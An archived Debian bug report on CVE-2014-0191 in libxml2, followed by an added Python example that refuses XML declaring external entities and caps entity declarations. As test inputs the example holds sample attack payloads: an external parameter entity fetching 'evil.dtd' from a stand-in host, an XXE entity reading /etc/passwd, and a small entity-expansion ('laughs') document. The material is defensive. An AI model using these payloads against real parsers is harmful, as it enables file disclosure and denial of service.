[xml/sgml-pkgs] Bug#747309: CVE-2014-0191
Moritz Muehlenhoff
jmm at debian.org
Wed May 7 11:40:26 UTC 2014
Package: libxml2
Version: 2.9.1+dfsg1-3
Severity: grave
Tags: security
Hi,
from oss-security. This was assigned CVE-2014-0191
| It was discovered that libxml2, a library providing support to read,
| modify and write XML files, incorrectly performs entity substitution in
| the doctype prolog, even if the application using libxml2 disabled any
| entity substitution. A remote attacker could provide a
| specially-crafted XML file that, when processed, would lead to the
| exhaustion of CPU and memory resources or file descriptors.
|
| This issue was discovered by Daniel Berrange of Red Hat.
Fix:
https://git.gnome.org/browse/libxml2/commit/?id=9cd1c3cfbd32655d60572c0a413e017260c854df
Cheers,
Moritz
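The quoted advisory makes a point worth carrying into application code: turning off entity substitution in the parser did not stop libxml2 from fetching external parameter entities declared in the DOCTYPE prolog, so "we disabled entities" was not a complete mitigation. The example below is added here and is not code from this report, from Debian, or from libxml2. It shows the policy an application can enforce on its own side regardless of parser settings: refuse any document whose prolog declares an external (general or parameter) entity before anything is resolved, and cap the number of internal entity declarations so entity-expansion amplification cannot start. It uses Python's standard-library expat binding rather than libxml2, so it illustrates the defensive check, not the patched libxml2 code path; the sample documents, the `.invalid` hostname, and the function names are constructed for this example.

```python
"""Refuse XML whose DOCTYPE prolog declares external entities.

Added illustration (not from the bug report or libxml2) of the policy that
would have blunted CVE-2014-0191-style inputs: never let the prolog pull in
external parameter or general entities, and bound the number of entity
declarations.  Uses Python's stdlib expat, not libxml2.
"""
import xml.parsers.expat


class UnsafeDTD(ValueError):
    """Raised when the prolog declares something we never want resolved."""


def parse_without_dtd_fetches(data: bytes, max_entities: int = 16) -> dict:
    """Parse `data`, rejecting external entities and oversized entity sets.

    Returns {"root": <root element name>, "entities": [internal entity
    names]} or raises UnsafeDTD before any external reference is followed.
    """
    p = xml.parsers.expat.ParserCreate()
    # Never parse parameter entities.  This is expat's default; the explicit
    # call documents the intent (the libxml2 analogue is leaving
    # XML_PARSE_NOENT and XML_PARSE_DTDLOAD out of the parser options).
    p.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    seen = {"root": None, "entities": []}

    def entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # expat passes value=None for external entities and puts the URI
        # in system_id; that is exactly the declaration we refuse.
        if value is None or system_id is not None:
            kind = "parameter" if is_param else "general"
            raise UnsafeDTD(f"external {kind} entity {name!r} -> {system_id!r}")
        seen["entities"].append(name)
        if len(seen["entities"]) > max_entities:
            raise UnsafeDTD(f"more than {max_entities} entity declarations")

    def external_ref(context, base, system_id, public_id):
        # Defence in depth: reached only if expat ever tries to resolve an
        # external reference that slipped past entity_decl.  Refuse, do not fetch.
        raise UnsafeDTD(f"refused external fetch of {system_id!r}")

    def start_element(name, attrs):
        if seen["root"] is None:
            seen["root"] = name

    p.EntityDeclHandler = entity_decl
    p.ExternalEntityRefHandler = external_ref
    p.StartElementHandler = start_element
    p.Parse(data, True)
    return seen


def check(data: bytes, **kw) -> str:
    """Convenience wrapper: 'accepted' or 'refused: <reason>'."""
    try:
        parse_without_dtd_fetches(data, **kw)
        return "accepted"
    except UnsafeDTD as exc:
        return f"refused: {exc}"


# Constructed sample documents (not taken from the report).
BENIGN = b'<?xml version="1.0"?><doc><item>ok</item></doc>'

# External parameter entity declared and referenced inside the prolog: the
# shape of input that libxml2 used to fetch even with substitution disabled.
HOSTILE_PROLOG = b"""<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY % remote SYSTEM "http://dtd.example.invalid/evil.dtd">
  %remote;
]>
<doc/>
"""

# External general entity (classic XXE shape).
XXE = b"""<?xml version="1.0"?>
<!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<doc>&xxe;</doc>
"""

# Internal entities only; harmless at this size, but the declaration cap
# stops the pattern from growing into an expansion bomb.
LAUGHS = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
"""

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("hostile prolog", HOSTILE_PROLOG),
                       ("xxe", XXE), ("laughs", LAUGHS)]:
        print(f"{label}: {check(doc)}")
    print(f"laughs with cap 2: {check(LAUGHS, max_entities=2)}")
```

The check fires on the entity declaration itself, not on the later `%remote;` reference, so the decision is made before the parser has any reason to open a URI or a file descriptor. If the application genuinely needs a DTD, the same handler can be narrowed to an allow-list of system identifiers instead of a blanket refusal.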